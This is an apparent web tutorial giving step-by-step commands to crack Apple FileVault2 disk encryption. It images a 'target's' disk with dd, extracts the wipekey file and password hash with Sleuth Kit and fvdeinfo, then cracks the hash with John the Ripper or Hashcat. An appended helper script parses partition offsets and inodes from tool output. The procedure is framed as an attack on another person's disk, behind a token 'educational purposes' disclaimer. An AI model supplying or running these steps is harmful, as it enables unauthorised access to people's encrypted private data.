How to Crack Apple’s FileVault2 Encryption

Here’s the tutorial to crack Apple’s FileVault2 encryption.

Purely for educational purposes only. We don’t encourage any illegal activities.

STEP 1: Use dd to extract an image of your target’s FileVault2 encrypted disk:

sudo dd if=/dev/disk2 of=/Volumes/path/to/filevault_image.dd conv=noerror,sync

STEP 2: Install fvde2john from https://github.com/kholia/fvde2john

STEP 3: Use hdiutil to attach the dd image:

hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount /Volumes/path/to/filevault_image.dd

STEP 4: Obtain EncryptedRoot.plist.wipekey from the “Recovery HD” partition (see https://github.com/libyal/libfvde/wiki/Mounting#obtaining-encryptedrootplistwipekey):

mmls /Volumes/path/to/filevault_image.dd

fls -r -o 50450752 /Volumes/path/to/filevault_image.dd | grep -i EncryptedRoot

icat -o 50450752 /Volumes/path/to/filevault_image.dd 130 > EncryptedRoot.plist.wipekey

STEP 5: Verify and note the device node of the Apple_Corestorage partition:

diskutil list

…/dev/disk3s2 Apple_Corestorage

STEP 6: Use EncryptedRoot.plist.wipekey with fvdeinfo to retrieve the hash:

sudo fvdetools/fvdeinfo -e EncryptedRoot.plist.wipekey -p blablah /dev/disk3s2

This returns the hash.

FINAL STEP: Load this hash into John the Ripper (JtR) or Hashcat to crack it:

john --format=FVDE-opencl --wordlist=dict.txt hash.txt

hashcat -a 0 -m 16700 hash.txt dict.txt
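
The offset 50450752 and inode 130 in STEP 4 belong to one particular disk layout and have to be read from the mmls and fls output of the image being examined. The script below is an added example, not part of the original tutorial or of The Sleuth Kit; the function names are hypothetical and the sample tool output is constructed.

```shell
#!/bin/sh
# Added example: read the STEP 4 offset and inode from tool output.
# All sample output below is constructed, not taken from a real image.
SAMPLE_MMLS='GUID Partition Table (EFI)
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Safety Table
001:  -------   0000000000   0000000039   0000000040   Unallocated
002:  Meta      0000000001   0000000001   0000000001   GPT Header
003:  Meta      0000000002   0000000033   0000000032   Partition Table
004:  000       0000000040   0000409639   0000409600   EFI System Partition
005:  001       0000409640   0050450751   0050041112   Macintosh HD
006:  002       0050450752   0051720287   0001269536   Recovery HD'
SAMPLE_FLS=$(printf '%s\t%s\n%s\t%s' \
    '+++ r/r 130:' 'EncryptedRoot.plist.wipekey' \
    '+++ r/r 131:' 'EncryptedRoot.plist.wipekey.bak')

# Print the start sector (the value for -o) of the partition whose
# description equals $1. Reads mmls output; fails unless exactly one matches.
partition_start() {
    awk -v want="$1" '
        /^[0-9]+:/ {
            desc = $0
            sub(/^[0-9]+:[ \t]+[^ \t]+[ \t]+[0-9]+[ \t]+[0-9]+[ \t]+[0-9]+[ \t]+/, "", desc)
            sub(/[ \t\r]+$/, "", desc)
            if (desc == want) { start = $3 + 0; n++ }   # +0 drops leading zeros
        }
        END { if (n != 1) exit 1; printf "%d\n", start }
    '
}

# Print the inode of the file named exactly $1 from fls -r output on stdin.
file_inode() {
    awk -F'\t' -v want="$1" '
        $2 == want {
            n++; inode = $1
            sub(/:$/, "", inode)       # "+++ r/r 130:" becomes "+++ r/r 130"
            sub(/^.*[ ]/, "", inode)   # keep the last space-separated token
        }
        END { if (n != 1 || inode !~ /^[0-9]+$/) exit 1; print inode }
    '
}

offset=$(printf '%s\n' "$SAMPLE_MMLS" | partition_start 'Recovery HD') || exit 1
inode=$(printf '%s\n' "$SAMPLE_FLS" | file_inode 'EncryptedRoot.plist.wipekey') || exit 1
echo "offset=$offset inode=$inode"
```

On a real image, pipe the output of mmls and of fls -r into the two functions in place of the sample variables.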